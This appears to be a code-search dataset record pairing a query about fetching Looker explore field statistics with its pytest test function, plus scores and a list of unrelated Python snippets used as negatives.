"def __getattribute__(self, name: str) -> Any:\n if name in (FLD_TITLE, FLD_ABSTRACT, FLD_FEES, FLD_ACCESS_CONSTRAINTS, FLD_CONTACT_POSITION, FLD_CONTACT_ORGANISATION):\n return self.read_local_metadata(name)\n elif name == FLD_KEYWORDS:\n kw = self.read_local_metadata(FLD_KEYWORDS)\n if kw:\n return set(kw.split(\",\"))\n else:\n return set()\n elif name == FLD_ATTRIBUTION:\n return self.read_local_metadata(FLD_ATTRIBUTION)\n else:\n return super().__getattribute__(name)", "def getexperimentinfo(expid):\n rdata = {}\n rdata['expId'] = expid\n res = requests.get(scbd_server_address + '/experiments/get_details', json=rdata)\n if res.status_code == 200:\n outstr = ''\n for cres in res.json()['details']:\n outstr += cres[0] + ':' + cres[1] + '<br>'\n # details=res.json()['details']\n return outstr\n return []", "def fields(self):\n if self._fields is None:\n self._init_fields()\n return self._fields" ]
[ "0.79898906", "0.7255912", "0.57427955", "0.5689888", "0.5485005", "0.544207", "0.5428259", "0.54008704", "0.5328612", "0.52564484", "0.5198791", "0.5090246", "0.5081006", "0.5072066", "0.50549966", "0.5046278", "0.49843732", "0.49804208", "0.49604252", "0.49604252", "0.49590856", "0.49215195", "0.49204257", "0.4919356", "0.49069488", "0.49057347", "0.48774806", "0.4862115", "0.48620763", "0.4860669", "0.48556656", "0.48417893", "0.48257262", "0.48104766", "0.4809317", "0.48083636", "0.48075446", "0.4805631", "0.4793343", "0.4783424", "0.47833648", "0.47669962", "0.4765332", "0.47533843", "0.47499633", "0.47422874", "0.47340128", "0.4726814", "0.47238484", "0.47170094", "0.46878967", "0.46850488", "0.46741295", "0.46721247", "0.4667797", "0.46665743", "0.46659198", "0.46539533", "0.46481672", "0.46439442", "0.4640407", "0.4622399", "0.45998886", "0.45974737", "0.45742458", "0.45700583", "0.4567617", "0.45631483", "0.45602584", "0.45508465", "0.45461255", "0.45337853", "0.45325878", "0.45290387", "0.45233563", "0.45228484", "0.4517839", "0.45158824", "0.45077515", "0.45014817", "0.44946963", "0.4488805", "0.4488432", "0.44847217", "0.44836968", "0.44814596", "0.44764274", "0.4474963", "0.44734204", "0.44696575", "0.44675663", "0.44564924", "0.44558954", "0.44557077", "0.4450573", "0.44456387", "0.44428995", "0.4441316", "0.44363564", "0.44270426" ]
0.81051433
0
fetcher.get_explore_field_stats() should get the stats of all fields in an explore.
def test_get_explore_field_stats( fc: fetcher.Fetcher, looker_sdk: methods.Looker40SDK, test_model, test_used_explore_names, test_explores_stats, ): explore = fc.get_explores( model=test_model["name"], explore=test_used_explore_names[0] )[0] actual_stats = fc.get_explore_field_stats(explore) assert isinstance(actual_stats, dict) for e in test_explores_stats: if e["name"] == test_used_explore_names[0]: expected_stats = e assert all(actual_stats[k] == 0 for k in expected_stats["unused_fields"]) assert all(actual_stats[k] > 0 for k in expected_stats["used_fields"])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def listFields(self):\n return self.get_json('/field')", "def _field_extract(url):\n logging.info('extracting player stats from url: {}'.format(url))\n player_summary = requests.get(url)\n parser = BeautifulSoup(player_summary.content, 'html.parser')\n player_profile = parser.select('tr')\n list_of_fields = ['Innings', 'Not Outs', 'Aggregate', 'Highest Score', '50s', '100s', 'Ducks', '4s',\n '6s', 'Scoring Rate', 'Overs', 'Runs Conceded', 'Wickets', 'Average', '4 Wickets in Innings',\n '5 Wickets in Innings', 'Best', 'Economy Rate', 'Strike Rate', 'Catches',\n 'Most Catches in Innings', 'Stumpings', 'Most Catches in Innings',\n 'Most Dismissals in Innings',\n 'Won/Lost', 'Matches/Won/Lost', 'Tosses Won', 'Runs Scored', 'Batting Average']\n mapped_fields = {} # holds series level stats\n stats_header = '' # holds series stats metric header\n for each_field in range(0, len(player_profile)):\n # get stats header\n try:\n stats = player_profile[each_field].select_one('.ProfileSection').text.strip()\n if stats in ['Batting', 'Fielding', 'Bowling', 'Wicket Keeping', 'Captaincy']:\n stats_header = stats\n except Exception as e:\n str(e) # just ignore the exception\n # update stats data\n try:\n field = player_profile[each_field].select_one('.FieldName').text.split(':')[0]\n value = player_profile[each_field].select_one('.FieldValue').text.strip()\n if field in list_of_fields:\n mapped_fields['{}_{}'.format(stats_header.lower(), field.replace(' ', '_').lower())] = value\n except AttributeError as ae:\n logging.info('skip: May be html tree doesn\\'t find search - {}'.format(ae))\n logging.info('extract completed for url: {} ..... /200'.format(url))\n return mapped_fields", "def field():\n data = request.get_json()\n return jsonify(result=Statistics.field_type_count(data['field']))", "def fields(self):\n ...", "def get_fields(self, path):\n with self.inspector(path) as opened_file:\n return opened_file.describe_fields()", "def fields(self):", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def get_fields(self, pager=None):\n return Field.deserialize_list(self._get_multiple('fields', {}, pager))", "def readAccessedFields(self):\n pass", "def _get_fields(self):\n return self._fields", "def _field_stat(self, field):\r\n if not field in self.stats:\r\n stat = dq.FieldStatistics(field, distinct_threshold = self.distinct_threshold)\r\n self.stats[field] = stat\r\n else:\r\n stat = self.stats[field]\r\n return stat", "def field(field_id):\n if not request.is_xhr:\n abort(403)\n\n if field_id == 0:\n field_id = session.get('current_field_id', 2)\n\n session['current_field_id'] = field_id\n state = {\n 'status': 0,\n 'field_size': 0,\n 'fox_count': 0,\n 'foxes': [],\n 'start_time': 0,\n 'end_time': 0,\n 'shot_count': 0,\n 'last_shot_result': '',\n 'hits': 0,\n 'is_in_top_10': False,\n }\n field = Field.query.get(field_id)\n state['field_size'] = field.size\n state['fox_count'] = field.fox_count\n\n installed_foxes = 0\n foxes = []\n random.seed()\n while installed_foxes < field.fox_count:\n x = random.randrange(field.size)\n y = random.randrange(field.size)\n fox = {\n 'x': x,\n 'y': y,\n }\n if fox in foxes:\n continue\n foxes.append(fox)\n installed_foxes += 1\n\n state['foxes'] = foxes\n session['state'] = state\n\n result = state.copy()\n del result['foxes'] # We don't want to spoil foxes' positions\n\n return jsonify(result)", "def field_names(self):\n ...", "def _get_all_field_functions(self):\n get_url = 'v1/fieldFunctions'\n self.field_functions = {f['mdmId']: f for f in self.carol.call_api(get_url, params=dict(pageSize=-1))['hits']}\n self.field_functions_id = {f['mdmName']: f['mdmId'] for f in self.field_functions.values()}", "def fields(request):\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response", "def get_query_fields(cls):\n ...", "def Fields(self):\n return self._fields", "def fields(self):\r\n pass", "def fields(self):\r\n return self._by_name.iteritems()", "def get_field_values(self, index, field, **kwargs):\n search = self._build_search(index, **kwargs)\n search.aggs.bucket('fieldCounts', 'terms', field=field, size=10000)\n fieldValues = {}\n for bucket in search.execute().aggregations.fieldCounts.buckets:\n fieldValues[bucket.key] = bucket.doc_count\n return fieldValues", "def get_fields(self):\r\n return self.fields", "def read_fields(self, limit = 0, collapse = False):\r\n\r\n keys = []\r\n probes = {}\r\n\r\n def probe_record(record, parent = None):\r\n for key, value in record.items():\r\n full_key = parent + \".\" + key if parent else key\r\n\r\n if self.expand and type(value) == dict:\r\n probe_record(value, full_key)\r\n continue\r\n\r\n if not full_key in probes:\r\n probe = brewery.dq.FieldTypeProbe(full_key)\r\n probes[full_key] = probe\r\n keys.append(full_key)\r\n else:\r\n probe = probes[full_key]\r\n probe.probe(value)\r\n\r\n count = 0\r\n for record in self.records():\r\n if collapse:\r\n record = collapse_record(record)\r\n\r\n probe_record(record)\r\n if limit and count >= limit:\r\n break\r\n count += 1\r\n\r\n fields = []\r\n\r\n for key in keys:\r\n probe = probes[key]\r\n field = Field(probe.field)\r\n\r\n storage_type = probe.unique_storage_type\r\n if not storage_type:\r\n field.storage_type = \"unknown\"\r\n elif storage_type == \"unicode\":\r\n field.storage_type = \"string\"\r\n else:\r\n field.storage_type = \"unknown\"\r\n field.concrete_storage_type = storage_type\r\n\r\n # FIXME: Set analytical type\r\n\r\n fields.append(field)\r\n\r\n self.fields = list(fields)\r\n return self.fields", "def get_fields(self, key=None):\n return self._get_query('fields', self._build_params(key=key), Field)", "def EvaluateFields(self, *float, **kwargs):\n ...", "def fields(self, _only_called=False, **kwargs):\n\n # Check for an operator and transform to mongo-style if there is one\n operators = [\"slice\"]\n cleaned_fields = []\n for key, value in kwargs.items():\n parts = key.split(\"__\")\n if parts[0] in operators:\n op = parts.pop(0)\n value = {\"$\" + op: value}\n\n key = \".\".join(parts)\n try:\n field_name, value = self._check_valid_field_name_to_project(key, value)\n except ValueError as e:\n raise e\n\n cleaned_fields.append((field_name, value))\n\n # divide fields on groups by their values\n # (ONLY group, EXCLUDE group etc.) and add them to _loaded_fields\n # as an appropriate QueryFieldList\n fields = sorted(cleaned_fields, key=operator.itemgetter(1))\n for value, group in itertools.groupby(fields, lambda x: x[1]):\n fields = [field for field, value in group]\n self._loaded_fields += QueryFieldList(fields, value=value, _only_called=_only_called)\n\n return self", "def getData(self):\n import labstep.entities.experimentDataField.repository as experimentDataFieldRepository\n\n return experimentDataFieldRepository.getDataFields(self)", "def describe_index_fields(DomainName=None, FieldNames=None, Deployed=None):\n pass", "def pull_fields(self, org):\n pass", "def inspect_model_fields(self, model: ModelRepresentation) -> None:\n c = model.count()\n title(f\"{model.name} ({c})\")\n print(model.fields_info())", "def fields(request):\n # Only recognizes a few fields for now.\n if request.method != 'POST':\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response\n\n if not request.issue.edit_allowed:\n if not IS_DEV:\n return HttpTextResponse('Login required', status=401)\n fields = json.loads(request.POST.get('fields'))\n issue = request.issue\n if 'description' in fields:\n issue.description = fields['description']\n if 'reviewers' in fields:\n issue.reviewers = _get_emails_from_raw(fields['reviewers'])\n issue.calculate_updates_for()\n if 'subject' in fields:\n issue.subject = fields['subject']\n issue.put()\n return HttpTextResponse('')", "def get_fields(self):\n return self.fields", "def get_fields(self):\n return self.fields", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def extract_fields(self, json_dict):\n raise NotImplementedError()", "def _retrieve_fields(self, scope, fields):\r\n if scope == Scope.user_state:\r\n return self._chunked_query(\r\n StudentModule,\r\n 'module_state_key__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n course_id=self.course_id,\r\n student=self.user.pk,\r\n )\r\n elif scope == Scope.user_state_summary:\r\n return self._chunked_query(\r\n XModuleUserStateSummaryField,\r\n 'usage_id__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.preferences:\r\n return self._chunked_query(\r\n XModuleStudentPrefsField,\r\n 'module_type__in',\r\n set(descriptor.scope_ids.block_type for descriptor in self.descriptors),\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.user_info:\r\n return self._query(\r\n XModuleStudentInfoField,\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n else:\r\n return []", "def getFieldNumbers():\n return _getCampaignDict()[\"field_numbers\"]", "def f(self):\r\n return self.fields()", "async def _get_facets_stats(self, index_schema, query_options,\n refinement_filter):\n facets_fields = [\n facet for facet in index_schema.facets\n if SolrSchemaFieldInfo.Type.is_facet_index(facet.type)\n ]\n request_facet_stats = [\n # e.g.: '{!count=true}myfacetname_facet'\n '{{!count=true}}{field_name}'.format(field_name=facet.solr_name)\n for facet in facets_fields\n ]\n solr_result = await self.solr.query_documents(\n collection=index_schema.collection, query=query_options.query_string,\n offset=0, limit=0, fields=['id'], def_type=query_options.def_type,\n query_fields=query_options.query_fields, filter_=refinement_filter,\n stats_fields=request_facet_stats\n )\n field_stats_items = []\n for facet in facets_fields:\n documents_count = solr_result.stats_results[facet.solr_name]['count']\n field_stats_items.append((facet, documents_count))\n return field_stats_items", "def get_fields():\n if not request.is_xhr:\n abort(403)\n fields = Field.query.all()\n result = {field.id:field.name for field in fields}\n return jsonify(result)", "def get_statistics_percentile(self,table,field):\n dict = {}\n for x in xrange(1,11):\n dict[x] = db.session.execute(\"select statistics_viewCount as percentile from meta order by percentile asc limit 1 OFFSET 19346*\"+str(x)+\"/10-1\").first().percentile", "def get_fields():\n return jsonify(result=Tree.fields())", "def get_drupal_field_cardinality(db_obj, db_cur, field_name):\n\n # query string and arguments\n query_str = (\n'''\nSELECT cardinality\nFROM field_config\nWHERE field_name = %s\nAND deleted = 0\n'''\n )\n query_args = ['field_' + field_name]\n\n # execute the query\n if not db_obj.execute(db_cur, query_str.strip(), query_args,\n has_results=True):\n return None\n ret = db_obj.fetchall(db_cur)\n if not ret[0]:\n return None\n if not ret[1]:\n return []\n # in theory, Drupal field names are unique, but it's not enforced in\n # the database, so add a sanity check\n if len(ret[1]) != 1:\n nori.core.email_logger.error(\n 'Warning: multiple entries for Drupal field name {0}.' .\n format(nori.pps(field_name))\n )\n return None\n return ret[1][0]", "def get_field_display_info(self, field_dict, field_name):\n raise NotImplementedError", "def get_fields(self):\n\n\t\treturn self.__fields", "def request_fields(self, fields=None):\n # The cursor only works for the 'search' endpoint, just call\n # the 'field' endpoint and return all the field types\n response = self.connection.get_request(self.uri_field)\n if response.status_code != requests.codes.ok:\n logger.warning('JIRA Cloud returned %d for %s', response.status_code, self.uri_field)\n return []\n content = json.loads(response.content)\n # Overwrite some fields\n for c in content:\n if c['name'] == 'Epic Status':\n c['schema']['type'] = 'string'\n c['choices'] = (('To Do', 'To Do'), ('In Progress', 'In Progress'), ('Done', 'Done'))\n elif c['name'] == 'Resolution':\n c['choices'] = self._get_resolutions()\n\n # The KEY field is never returned\n c = {\n \"id\": \"key\",\n \"key\": \"key\",\n \"name\": \"Key\",\n \"custom\": False,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"key\",\n ],\n \"schema\": {\n \"type\": \"string\",\n }\n }\n content.append(c)\n # The parent field is never returned\n c = {\n \"id\": \"parent\",\n \"key\": \"parent\",\n \"name\": \"Parent\",\n \"custom\": True,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"parent\",\n ],\n \"schema\": {\n \"type\": \"any\",\n \"custom\": \"com.django-atlassian:parent\"\n }\n }\n content.append(c)\n return content", "def get_fields(self):\n\n return self.get_coverage_rangetype()", "def stored_fields(self, docnum):\n\t\treturn self.index.collection.get(docnum).keys()", "def trace_all_fields(opt_model):\n osp = opt_model.optical_spec\n fld, wvl, foc = osp.lookup_fld_wvl_focus(0)\n fset = []\n for f in osp.field_of_view.fields:\n rset = trace_field(opt_model, f, wvl, foc)\n fset.append(rset)\n\n fdf = pd.concat(fset, keys=osp.field_of_view.index_labels,\n names=['field'])\n return fdf", "def fieldsUrl(self):\n return self.lweBaseUrl + \\\n \"/collections/\" + self.collectionName + \\\n \"/fields\"", "def db_stats(self):\n return { \"search_and_get\": self.db_search_and_get }", "def GatherPageData(self, mr):\n # TODO(jrobbins): Allow deep-linking into this page.\n canned_query_views = []\n if mr.project_id:\n with mr.profiler.Phase('getting canned queries'):\n canned_queries = self.services.features.GetCannedQueriesByProjectID(\n mr.cnxn, mr.project_id)\n canned_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(canned_queries)]\n\n saved_query_views = []\n if mr.auth.user_id and self.services.features:\n with mr.profiler.Phase('getting saved queries'):\n saved_queries = self.services.features.GetSavedQueriesByUserID(\n mr.cnxn, mr.me_user_id)\n saved_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(saved_queries)\n if (mr.project_id in sq.executes_in_project_ids or\n not mr.project_id)]\n\n return {\n 'issue_tab_mode': 'issueAdvSearch',\n 'page_perms': self.MakePagePerms(mr, None, permissions.CREATE_ISSUE),\n 'canned_queries': canned_query_views,\n 'saved_queries': saved_query_views,\n }", "def get_fields(node):\r\n return dict(iter_fields(node))", "def _all_data_fields(field):\n all_fields = PhotoTech.objects.all().values()\n return list(set([all_fields[x][field]\n for x in range(len(all_fields))]))", "def stats():\n stats = es.indices.stats(\n index='webpages',\n metric=[\"docs\", \"store\"],\n fields=[\"count\"],\n human='true'\n )\n \n return stats", "def get_statistics(self, data, field):\n statistics = super(NumberField, self).get_statistics(data, field)\n numeric_statistics = NumericStatistics(data)\n statistics.update(numeric_statistics.getSerializedData())\n return statistics", "def objectFields(self):\n raise NotImplementedError", "def get_fields_list(self):\n return self.description[\"fields\"][\"values\"].keys()", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def _get_fields(self):\n if not self._cursor.description:\n return {}\n\n results = {}\n column = 0\n\n for des in self._cursor.description:\n fieldname = des[0]\n results[column] = fieldname\n column = column + 1\n\n return results", "def get_fields(self):\n return list(self.metadata.keys())", "def get_exp_meta(self, count=0):\n return {\n u\"limit\": 20,\n u\"next\": None,\n u\"offset\": 0,\n u\"previous\": None,\n u\"total_count\": count,\n }", "def get_fields(self):\n\t\tlogging.debug(\"Beginning\")\n\t\toptions=dict(api_key = self.apiKey, results = 0)\n\t\turl = '{ts}channels/{id}/feeds.json'.format(\n\t\t\tts=self.tsRUL,\n\t\t\tid=self.channel\n\t\t)\n\t\ttry:\n\t\t\tresults = requests.get(url, params=options)\n\t\t\tif results.ok != True:\n\t\t\t\tlogging.error(\"The URL didn't return a 200\")\n\t\t\t\treturn\n\t\texcept:\n\t\t\tlogging.error(\"Error calling the thingspeak URL\")\n\t\t\treturn\n\t\tresultsJson = results.json()\n\t\tchannelsJson = resultsJson['channel']\n\t\tfields = dict()\n\t\tfor i in range(1,8):\n\t\t\tif 'field'+str(i) in channelsJson:\n\t\t\t\tfields['field'+str(i)] = channelsJson['field'+str(i)]\n\t\treturn fields", "def get_fields(self):\n \n return self.metadata.keys()", "def list_fields(fixture_file=settings.FIXTURE_PATH, list_to_shell=True):\n fields = []\n with open(fixture_file, 'r') as posts:\n posts = json.load(posts, encoding='utf8')\n i = 0\n for post in posts:\n for field in post['fields']:\n fields.append(field)\n i += 1\n if list_to_shell:\n print yellow(\"All available BlogPost fields:\")\n print fields\n print yellow(\"%i fields total\" % i)\n return fields", "def get_features(item, GP):\n contents_url = '%s/contents' % item['url']\n\n # scrape readme\n gf.get_readme_length(contents_url, GP)\n\n # scrape file-by-file stats\n digest_repo(contents_url, GP)\n\n # scrape commit history\n gf.get_repo_commit_history(item, GP)\n\n # scrape stargazers\n GP.n_stars = item['stargazers_count']\n\n # scrape forks\n GP.n_forks = item['forks_count']\n\n return GP", "def test_accessing_json_fields(pawprint_default_tracker_db_with_table):\n\n tracker = pawprint_default_tracker_db_with_table\n\n # JSON objects in our tracking database\n simple = {\"integral\": \"derivative\"}\n medium = {\"montecarlo\": {\"prior\": \"likelihood\"}}\n difficult = {\n \"deepnet\": [\"mlp\", \"cnn\", \"rnn\"],\n \"ensembles\": {\"random\": \"forest\", \"always\": {\"cross_validate\": [\"kfold\", \"stratified\"]}},\n }\n\n tracker.write(event=\"maths\", metadata=simple)\n tracker.write(event=\"stats\", metadata=medium)\n tracker.write(event=\"ml\", metadata=difficult)\n\n maths_all = tracker.read(\"metadata__integral\")\n maths_condition = tracker.read(\"metadata__integral\", event=\"maths\")\n assert len(maths_all) == 3\n assert len(maths_condition) == 1\n assert list(maths_all.json_field) == [\"derivative\", None, None]\n\n stats = tracker.read(\"metadata__montecarlo__prior\").dropna()\n assert len(stats) == 1\n assert stats.json_field.iloc[0] == \"likelihood\"\n\n types_of_nn = tracker.read(\"metadata__deepnet\").dropna()\n best_nn = tracker.read(\"metadata__deepnet__1\").dropna()\n full_depth = tracker.read(\"metadata__ensembles__always__cross_validate__0\").dropna()\n assert len(types_of_nn) == 1\n assert len(best_nn) == 1\n assert best_nn.json_field.iloc[0] == \"cnn\"\n assert len(full_depth) == 1\n assert full_depth.json_field.iloc[0] == \"kfold\"", "def get_mediafile_details(mediafile_id, fields):\n query = MediaFiles.query \\\n .join(Locations, MediaFiles.location_id == Locations.id) \\\n .join(Users, MediaFiles.user_id == Users.id) \\\n .filter(MediaFiles.id == mediafile_id) \\\n .add_columns(*fields)\n logging.debug('Query executed: %s' % query)\n data = to_dict(query.first(), fields)\n values = {'accessed': get_time_str(), 'visits': data['visits'] + 1 if 'visits' in data else 0}\n if values['visits']:\n update_mediafile_values(mediafile_id, values)\n return data", "def fields(self):\n if self._fields is None:\n self._init_fields()\n return self._fields", "def stored_fields(self, docnum):\r\n return self.doc_reader[docnum]", "def search_fields(self, fields, query, index=None, doc_type=None):\r\n result_dict = {}\r\n master_list = []\r\n scores = {}\r\n for field in fields:\r\n items = self.search({\r\n 'query': {\r\n 'fuzzy_like_this_field': {\r\n field: {\r\n 'like_text': query\r\n ,'max_query_terms': 250\r\n }\r\n }\r\n }\r\n }, index=index, doc_type=doc_type, size=25)\r\n if len(items) > 0 :\r\n result_dict[field] = items\r\n\r\n seen = set()\r\n all = []\r\n for field in result_dict:\r\n for item in result_dict[field]:\r\n if item['_id'] not in seen:\r\n seen.add(item['_id'])\r\n all.append(item)\r\n\r\n return all", "def fields(self) -> List[Field]: # pragma: no cover\n pass", "def update_field_stats(self, tweet):\n\n stats = self.stats\n for f in self.tweet_fields:\n if tweet.has_key(f):\n f_val = tweet[f]\n if f_val is None:\n continue\n if stats[f].has_key(f_val):\n stats[f][f_val] += 1\n else:\n stats[f][f_val] = 1", "def test_query_api_result_fields():\n # Pick the first result and test for all fields\n result = query_api(url, \"test\")[0]\n assert all(field in result.keys() for field in fields)", "def all_fields(item):\n return scom.all_fields(item)", "def dig_fields(json_data):\n data = json.loads(json_data)\n fields = [f for f in data]\n return fields", "def get_fields(self):\n\t\treturn self.__fields.copy()", "def get_fieldlist(cls):\n return cls.fieldlist", "def get_fields(cls):\n return cls.fields.values()", "def test_get_document_with_fields(index_with_documents):\n response = index_with_documents().get_document(\"500682\", {\"fields\": [\"id\", \"title\"]})\n assert isinstance(response, Document)\n assert hasattr(response, \"title\")\n assert not hasattr(response, \"poster\")\n # assert 'poster' not in response\n assert response.title == \"The Highwaymen\"", "def _all_fields_all_data():\n # Takes all name fields\n all_fields = PhotoTech.objects.all().values()[0].keys()\n # For all fileds takes all fields data \n all_data = [PhotoView._all_data_fields(x) for x in all_fields]\n allowed_search_fields = ['zoom',\n 'matrix_resol',\n 'color',\n 'matrix_size',\n 'country']\n # Return dict {keys: fields}\n return {x: y for x, y in zip(all_fields, all_data)\n if x in allowed_search_fields}", "def fields(self):\n return ('title', 'services_used', 'service_provider', \n 'allocated', 'used', 'community', \n 'topics', 'start_date', 'state')", "def field_values(self):\n return self.proto.field_values", "def getFields(self):\n return sorted(self.schema.fields, key=lambda f: f.name)", "def getFieldDetails(self, field_name):\n try:\n value_list = []\n con = self.getMetadataDatabaseConnection()\n results = con.cursor()\n con.cursor().callproc('qiime_assets.get_field_details', [field_name, results])\n\n for row in results:\n # column_name, data_type, desc_or_value, definition, active\n value_list.append((row[0], row[1], row[2], row[3], row[4]))\n \n if len(value_list) == 0:\n # If not found in the dictionary, assume this is a user-created column\n value_list.append((field_name, 'text', '', ''))\n \n return value_list[0]\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def most_viewed(self, field):\r\n return PageHit.objects.filter(item=field)\\\r\n .annotate(score=models.Count('item'))\\\r\n .order_by('-score')", "def field(self, field):\r\n url = '{0}/{1}'.format(self.get_url(), field)\r\n request = http.Request('GET', url)\r\n return request, parsers.parse_json", "def get_host_data_fields(self):\n\n raise NotImplementedError", "def stats(self):\n raise NotImplementedError(\"Must implement in frontend subclass.\")", "def EvaluateLocationAndFields(self, *float, **kwargs):\n ...", "def statistics(self):\n stats = {}\n fields = {\n 'Hit count:': ('hit_count', Value.from_number),\n 'Miss count:': ('miss_count', Value.from_number),\n 'Hit ratio:': ('hit_ratio', Value.from_percent),\n 'Item count:': ('item_count', Value.from_number),\n 'Total cache size:': ('total_cache_size', Value.from_number),\n 'Oldest item age:': ('oldest_item_age', Value.from_time_ago),\n }\n selector = '#ae-stats-table tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 2, [text(child) for child in children]\n if text(children[0]).strip() in fields:\n # skip rows with invalid or empty cells\n field_name, value_fn = fields[text(children[0]).strip()]\n stats[field_name] = value_fn(text(children[1]))\n # Ensure all fields were filled.\n assert len(stats) == len(fields), (fields.keys(), stats.keys())\n return stats", "def get_api_fields(cls):\n return ['fqdn', 'ttl', 'description', 'views']", "def field(name,dr14=False,dir='./',minvisit=1) :\n all=struct.concat([dir+'/apVisitSum*.fits'])\n if name == 'M67' : locid=[os.environ['APOGEE_REDUX']+'/r8/fields/apo25m/4162//apVisitSum*']\n elif name == 'N188' : locid=[os.environ['APOGEE_REDUX']+'/r8/fields/apo25m/4217//apVisitSum*', \n os.environ['APOGEE_REDUX']+'/r8/fields/apo25m/5067//apVisitSum*']\n alldr14=struct.concat(locid)\n objs = set(all['APOGEE_ID'])\n vhelio = []\n vscat = []\n verr = []\n sigfiber = []\n vdiff = []\n n = []\n dr14vhelio = []\n dr14vscat = []\n dr14sigfiber = []\n dr14n = []\n dr14vdiff = []\n for obj in objs :\n j = np.where(all['APOGEE_ID'] == obj)[0]\n vhelio.append(all['VHELIO'][j].mean())\n vscat.append(all['VHELIO'][j].std())\n verr.append(all['VRELERR'][j].max())\n sigfiber.append(all['FIBERID'][j].std())\n vdiff.extend(all['VHELIO'][j]-all['VHELIO'][j].mean())\n n.append(len(j))\n #print(all['MJD'][j],all['VHELIO'][j])\n j = np.where(alldr14['APOGEE_ID'] == obj)[0]\n dr14vhelio.append(alldr14['VHELIO'][j].mean())\n dr14vscat.append(alldr14['VHELIO'][j].std())\n dr14sigfiber.append(alldr14['FIBERID'][j].std())\n dr14n.append(len(j))\n dr14vdiff.extend(alldr14['VHELIO'][j]-alldr14['VHELIO'][j].mean())\n #print(all['MJD'][j],all['VHELIO'][j],all['VRELERR'][j])\n #print(alldr14['MJD'][j],alldr14['VHELIO'][j],alldr14['VRELERR'][j])\n #pdb.set_trace()\n vhelio=np.array(vhelio)\n vscat=np.array(vscat)\n verr=np.array(verr)\n sigfiber=np.array(sigfiber)\n n=np.array(n)\n dr14vhelio=np.array(dr14vhelio)\n dr14vscat=np.array(dr14vscat)\n dr14sigfiber=np.array(dr14sigfiber)\n dr14n=np.array(dr14n)\n fig,ax=plots.multi(2,3)\n gd =np.where(n > minvisit)[0]\n ax[0,0].hist(vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',cumulative=True,normed=True,color='b')\n ax[0,0].hist(dr14vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',cumulative=True,normed=True,color='r')\n gd=np.where((verr < 0.2) & (n>minvisit))[0]\n ax[0,0].hist(vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',cumulative=True,normed=True,color='g')\n ax[0,0].hist(dr14vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',cumulative=True,normed=True,color='m')\n ax[2,1].hist(vscat[gd],bins=np.arange(0.01,1,0.01),histtype='step',color='k')\n 